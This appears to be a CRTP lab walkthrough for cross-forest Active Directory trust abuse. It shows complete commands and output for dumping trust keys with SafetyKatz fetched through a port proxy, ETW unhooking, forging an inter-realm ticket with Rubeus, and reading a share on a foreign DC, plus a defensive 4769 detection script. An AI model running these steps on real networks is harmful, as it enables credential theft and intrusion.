crtp-20

Learning Object 20

Tasks

1 – With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest

Flag 31 [eurocorp-dc] – Service for which a TGS is requested from eurocorp-dc 🚩

Flag 32 [eurocorp-dc] – Contents of secret.txt on eurocorp-dc 🚩

Solutions
1 – With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest

We need the trust key for the trust between dollarcorp and eurocorp, which can be retrieved using Mimikatz or SafetyKatz.

First of all, start a process as DA. Run the below command from an elevated command prompt:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Run the below commands from the process running as DA to copy Loader.exe on dcorp-dc and use it to extract credentials:

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.67
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"

C:\Windows\system32>klist

Current LogonId is 0:0x2d293d7f

Cached Tickets: (1)

#0>     Client: svcadmin @ DOLLARCORP.MONEYCORP.LOCAL
        Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/21/2025 7:09:29 (local)
        End Time:   11/21/2025 17:09:29 (local)
        Renew Time: 11/28/2025 7:09:29 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
C:\AD\Tools\Loader.exe
1 File(s) copied

C:\Windows\system32>winrs -r:dcorp-dc cmd
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Users\svcadmin>netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.98
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.98


C:\Users\svcadmin>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : http://127.0.0.1:8080/SafetyKatz.exe Arguments : lsadump::evasive-trust /patch exit
  .#####.   mimikatz 2.2.0 (x64) #19041 Nov  5 2024 21:52:02

mimikatz(commandline) # lsadump::evasive-trust /patch

Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)

Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 11/20/2025 9:11:47 PM - CLEAR   - 1d 02 4f 0e ef 3c 6b c5 a9 68 da a8 ff 84 46 8a d7 73 65 a8 a6 f9 66 7a 36 b9 84 0e
        * aes256_hmac       1474657fb02a0d0962ef38a7e2012168125740f0792ecfdcae819a0bb71f059e
        * aes128_hmac       76dde25f5cb939a9d05a27c51e5bc7ba
        * rc4_hmac_nt       b97258189d756ae1eceeafa5be671457

 [ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 11/20/2025 9:11:47 PM - CLEAR   - 1d 02 4f 0e ef 3c 6b c5 a9 68 da a8 ff 84 46 8a d7 73 65 a8 a6 f9 66 7a 36 b9 84 0e
        * aes256_hmac       12a4abf8b945837dcbb84057eda74edc4640e6b4cd4217616a90418e1b162389
        * aes128_hmac       97dba31e904a25f6fc39fdd6166ab53e
        * rc4_hmac_nt       b97258189d756ae1eceeafa5be671457

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 10/28/2025 8:02:55 PM - CLEAR   - 87 56 2b ce 99 43 58 c6 aa 1e e9 c3 e3 17 23 37 3b 85 aa 14 d5 86 06 f4 a8 e8 b5 dd
        * aes256_hmac       b808886542d5ea5a9208dda236cc687cd861a73973eed77c0ef9d734411ec26c
        * aes128_hmac       829ca62806fba9880a9e57570c9a7b0b
        * rc4_hmac_nt       f5e6ae3ac347db331bf8fae481e2add9

 [Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 10/28/2025 8:02:55 PM - CLEAR   - 87 56 2b ce 99 43 58 c6 aa 1e e9 c3 e3 17 23 37 3b 85 aa 14 d5 86 06 f4 a8 e8 b5 dd
        * aes256_hmac       b1730088086a05cd9f6b6e110d4c2197c434cbb425237e833e82ef6d0ffef3d6
        * aes128_hmac       6b069f352975003d6667f937bb316f69
        * rc4_hmac_nt       f5e6ae3ac347db331bf8fae481e2add9


Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
    * 11/20/2025 9:11:54 PM - CLEAR   - 34 33 3c 6c 17 9d 51 f2 3c 5b 51 66 0f 2b 28 6c 95 a5 b5 86 8c 84 8d 96 76 cc 66 c3
        * aes256_hmac       cd470abac8112ddf6bb71476b299a72cd12c1431d43391f9dfa0b5b4dec103d9
        * aes128_hmac       4954422aabc2d55da5da954c57dd4835
        * rc4_hmac_nt       54eeab7d22c9737cc200d697d2528a40

 [ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 11/20/2025 9:11:54 PM - CLEAR   - 34 33 3c 6c 17 9d 51 f2 3c 5b 51 66 0f 2b 28 6c 95 a5 b5 86 8c 84 8d 96 76 cc 66 c3
        * aes256_hmac       c19d7fd15fe97c0498afd8a1d0677ff5d21da0c87c9962d755d649380e582818
        * aes128_hmac       1bc4b26049a0394471fd7ec7ffb1663b
        * rc4_hmac_nt       54eeab7d22c9737cc200d697d2528a40

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
    * 10/28/2025 8:03:10 PM - CLEAR   - 52 32 26 df e4 45 cd 5f 6f 81 46 1d 08 5f 84 2d 87 15 cc 5b 23 df 86 29 46 06 2c 3c
        * aes256_hmac       c46a67dc004efe316925c4229f77861ad551c14fe7e53bc86dc4fb07c38a0417
        * aes128_hmac       850f8059df357c0f05d9dfd3be600350
        * rc4_hmac_nt       b45751dacee142681ed299777fbd5e85

 [Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 10/28/2025 8:03:10 PM - CLEAR   - 52 32 26 df e4 45 cd 5f 6f 81 46 1d 08 5f 84 2d 87 15 cc 5b 23 df 86 29 46 06 2c 3c
        * aes256_hmac       b181e6f8dc36948d6d6136d1b2e0a2d671ffe95c7f1351e25a29b8820b3b5717
        * aes128_hmac       95ae70e4be6d836b095c52e04c0cc5d8
        * rc4_hmac_nt       b45751dacee142681ed299777fbd5e85


Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 11/20/2025 9:11:52 PM - CLEAR   - c1 21 4b 8c c0 d4 0f b1 41 db c9 36 45 25 e7 d5 44 e0 e4 2a 4e 22 2f 18 4a c7 82 5e
        * aes256_hmac       de4319c5f0f09ea07d28b20dfd473424d293fa5eb4fe0d7c35c622c7a7141883
        * aes128_hmac       76374484bba81cf3b846aa24cf7f5e6b
        * rc4_hmac_nt       d418915cb2459e02cd612e1bab6632a7

 [ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 11/20/2025 9:11:52 PM - CLEAR   - c1 21 4b 8c c0 d4 0f b1 41 db c9 36 45 25 e7 d5 44 e0 e4 2a 4e 22 2f 18 4a c7 82 5e
        * aes256_hmac       b7edf9f19286966d4d1984b76af30839ca06a606e4ead91f0f76c8e8007917d0
        * aes128_hmac       13e386e460f0cd28241d49b17155783d
        * rc4_hmac_nt       d418915cb2459e02cd612e1bab6632a7

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 10/28/2025 8:03:04 PM - CLEAR   - a0 2a f2 8c 58 dd 33 17 7d ab 7c ad 8c f0 44 12 bf a2 fe 46 de 82 ad c6 4f 48 02 fc
        * aes256_hmac       e488ce0980cb99955f6e125bf270fc3f777872027d12589384a4b20428f18cf4
        * aes128_hmac       fb717a9bedc09971ccc9d6759f90f20a
        * rc4_hmac_nt       eb18052334cdd048166749c13e2e0b5c

 [Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 10/28/2025 8:03:04 PM - CLEAR   - a0 2a f2 8c 58 dd 33 17 7d ab 7c ad 8c f0 44 12 bf a2 fe 46 de 82 ad c6 4f 48 02 fc
        * aes256_hmac       ab20acc4fb33ab4959a4aaf5d40805295b57158b0c3a8a589b9ac39b276f1750
        * aes128_hmac       f02dd82fc00fd22d11b32e1d186a7026
        * rc4_hmac_nt       eb18052334cdd048166749c13e2e0b5c


mimikatz(commandline) # exit
Bye!

C:\Users\svcadmin>

C:\Users\svcadmin>
Let's forge a referral ticket. The trust key we need is the one for the trust from DOLLARCORP.MONEYCORP.LOCAL to EUROCORP.LOCAL, repeated here from the output above:
Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 11/20/2025 9:11:52 PM - CLEAR   - c1 21 4b 8c c0 d4 0f b1 41 db c9 36 45 25 e7 d5 44 e0 e4 2a 4e 22 2f 18 4a c7 82 5e
        * aes256_hmac       de4319c5f0f09ea07d28b20dfd473424d293fa5eb4fe0d7c35c622c7a7141883
        * aes128_hmac       76374484bba81cf3b846aa24cf7f5e6b
        * rc4_hmac_nt       d418915cb2459e02cd612e1bab6632a7


Note that we are not injecting any SID History here as it would be filtered out. In a new low privilege cmd prompt, run the below command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:d418915cb2459e02cd612e1bab6632a7 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap
C:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:d418915cb2459e02cd612e1bab6632a7 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:d418915cb2459e02cd612e1bab6632a7 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap
[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-1806204659-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain         : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID            : S-1-5-21-719815819-3726368948-3917688648
[*] UserId         : 500
[*] Groups         : 544,512,520,513
[*] ExtraSIDs      : S-1-5-21-335606122-960912869-3279953914-519
[*] ServiceKey     : D418915CB2459E02CD612E1BAB6632A7
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey         : D418915CB2459E02CD612E1BAB6632A7
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_MD5
[*] Service        : krbtgt
[*] Target         : DOLLARCORP.MONEYCORP.LOCAL

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@dollarcorp.moneycorp.local'

[*] AuthTime       : 11/21/2025 7:17:44 AM
[*] StartTime      : 11/21/2025 7:17:44 AM
[*] EndTime        : 11/21/2025 5:17:44 PM
[*] RenewTill      : 11/28/2025 7:17:44 AM

[*] base64(ticket.kirbi):

      [base64 ticket omitted]

C:\Users\student98>


Copy the base64 encoded ticket from above and use it in the following command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket:

Once the ticket is injected, we can access explicitly shared resources on eurocorp-dc.

type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\

C:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket:<base64 ticket omitted>
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket:<base64 ticket omitted>
[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/eurocorp-dc.eurocorp.LOCAL'
[*] Using domain controller: eurocorp-dc.eurocorp.LOCAL (172.16.15.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

      [base64 ticket omitted]

  ServiceName              :  cifs/eurocorp-dc.eurocorp.LOCAL
  ServiceRealm             :  EUROCORP.LOCAL
  UserName                 :  Administrator (NT_PRINCIPAL)
  UserRealm                :  DOLLARCORP.MONEYCORP.LOCAL
  StartTime                :  11/21/2025 7:20:16 AM
  EndTime                  :  11/21/2025 5:17:44 PM
  RenewTill                :  11/28/2025 7:17:44 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  D/FM7NPPc4tNwttPm7f4rRSpwUvZ+q4VP4QYpMNRhRI=

C:\Users\student98>klist

Current LogonId is 0:0x2d1a0029

Cached Tickets: (1)

#0>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: cifs/eurocorp-dc.eurocorp.LOCAL @ EUROCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/21/2025 7:20:16 (local)
        End Time:   11/21/2025 17:17:44 (local)
        Renew Time: 11/28/2025 7:17:44 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

C:\Users\student98>type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
Dollarcorp DAs can read this!
C:\Users\student98>dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\
 Volume in drive \\eurocorp-dc.eurocorp.local\SharedwithDCorp has no label.
 Volume Serial Number is 1A5A-FDE2

 Directory of \\eurocorp-dc.eurocorp.local\SharedwithDCorp

11/16/2022  04:26 AM    <DIR>          .
11/15/2022  06:17 AM                29 secret.txt
               1 File(s)             29 bytes
               1 Dir(s)   7,447,212,032 bytes free

C:\Users\student98>


Note that the only way to enumerate accessible resources (a service on a machine) in eurocorp is to request a TGS for each one and then attempt to access it.
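As an added defender-side illustration (not part of the original lab notes): every ticket requested from eurocorp-dc, whether the cifs ticket above or the per-service TGS requests the note describes, is logged by that DC as Event ID 4769 together with the requesting principal's realm. The Python below runs two checks over constructed, flattened 4769 records: foreign-realm principals obtaining tickets for tier-0 hosts, and foreign-realm principals requesting tickets for many distinct services. The local realm, tier-0 host list, threshold and sample records are all assumptions made for this example.

```python
import re
from collections import defaultdict

# Realm of the DC whose security log is reviewed, its tier-0 hosts and the
# per-principal threshold for "many services" (assumptions for this example).
LOCAL_REALM = "EUROCORP.LOCAL"
TIER0_HOSTS = {"eurocorp-dc.eurocorp.local"}
ENUM_THRESHOLD = 3

# Constructed, flattened Event ID 4769 records (field names follow the Windows
# event XML, but this is not real EVTX output). Record 1 mirrors the lab's
# cifs/eurocorp-dc request by a DOLLARCORP principal; records 3-5 mimic the
# TGS-per-service probing described in the note above.
SAMPLE_4769 = """\
EventID=4769 TargetUserName=Administrator@DOLLARCORP.MONEYCORP.LOCAL TargetDomainName=DOLLARCORP.MONEYCORP.LOCAL ServiceName=cifs/eurocorp-dc.eurocorp.LOCAL IpAddress=172.16.100.98 Status=0x0
EventID=4769 TargetUserName=ecorp-user@EUROCORP.LOCAL TargetDomainName=EUROCORP.LOCAL ServiceName=cifs/eurocorp-dc.eurocorp.LOCAL IpAddress=172.16.15.20 Status=0x0
EventID=4769 TargetUserName=svc-scan@DOLLARCORP.MONEYCORP.LOCAL TargetDomainName=DOLLARCORP.MONEYCORP.LOCAL ServiceName=http/ecorp-web.eurocorp.local IpAddress=172.16.100.98 Status=0x0
EventID=4769 TargetUserName=svc-scan@DOLLARCORP.MONEYCORP.LOCAL TargetDomainName=DOLLARCORP.MONEYCORP.LOCAL ServiceName=MSSQLSvc/ecorp-sql.eurocorp.local:1433 IpAddress=172.16.100.98 Status=0x0
EventID=4769 TargetUserName=svc-scan@DOLLARCORP.MONEYCORP.LOCAL TargetDomainName=DOLLARCORP.MONEYCORP.LOCAL ServiceName=ldap/ecorp-app.eurocorp.local IpAddress=172.16.100.98 Status=0x0
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")

def parse_4769(text):
    """Turn each flattened record into a dict; ignore anything that is not a 4769."""
    events = []
    for line in text.splitlines():
        fields = dict(FIELD_RE.findall(line))
        if fields.get("EventID") == "4769":
            events.append(fields)
    return events

def service_host(spn):
    """Host part of 'class/host[:port]', lower-cased for comparison."""
    _, _, host = spn.partition("/")
    return host.split(":")[0].lower()

def find_cross_forest_access(events):
    """Principals from another realm obtaining service tickets for tier-0 hosts."""
    hits = []
    for e in events:
        realm = e.get("TargetDomainName", "").upper()
        if realm != LOCAL_REALM and service_host(e.get("ServiceName", "")) in TIER0_HOSTS:
            hits.append((e["TargetUserName"], e["ServiceName"], e.get("IpAddress", "")))
    return hits

def find_service_enumeration(events, threshold=ENUM_THRESHOLD):
    """Principals from another realm requesting tickets for many distinct services."""
    seen = defaultdict(set)
    for e in events:
        if e.get("TargetDomainName", "").upper() != LOCAL_REALM:
            seen[e["TargetUserName"]].add(e.get("ServiceName", "").lower())
    return {user: sorted(spns) for user, spns in seen.items() if len(spns) >= threshold}

if __name__ == "__main__":
    evts = parse_4769(SAMPLE_4769)
    for hit in find_cross_forest_access(evts):
        print("cross-forest ticket for tier-0 host:", hit)
    for user, spns in find_service_enumeration(evts).items():
        print("possible service enumeration by", user, "->", spns)
```

A legitimate cross-forest user (record 2 is a local one and is ignored) can also trigger the first check, so the tier-0 host list should be kept to DCs and similar machines where foreign principals normally have no business.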

Flag 31 [eurocorp-dc] – Service for which a TGS is requested from eurocorp-dc 🚩

Based on the following command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket:<base64 ticket omitted>

cifs is the service for which a TGS is requested from eurocorp-dc.

Flag 32 [eurocorp-dc] – Contents of secret.txt on eurocorp-dc 🚩

type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt

Dollarcorp DAs can read this!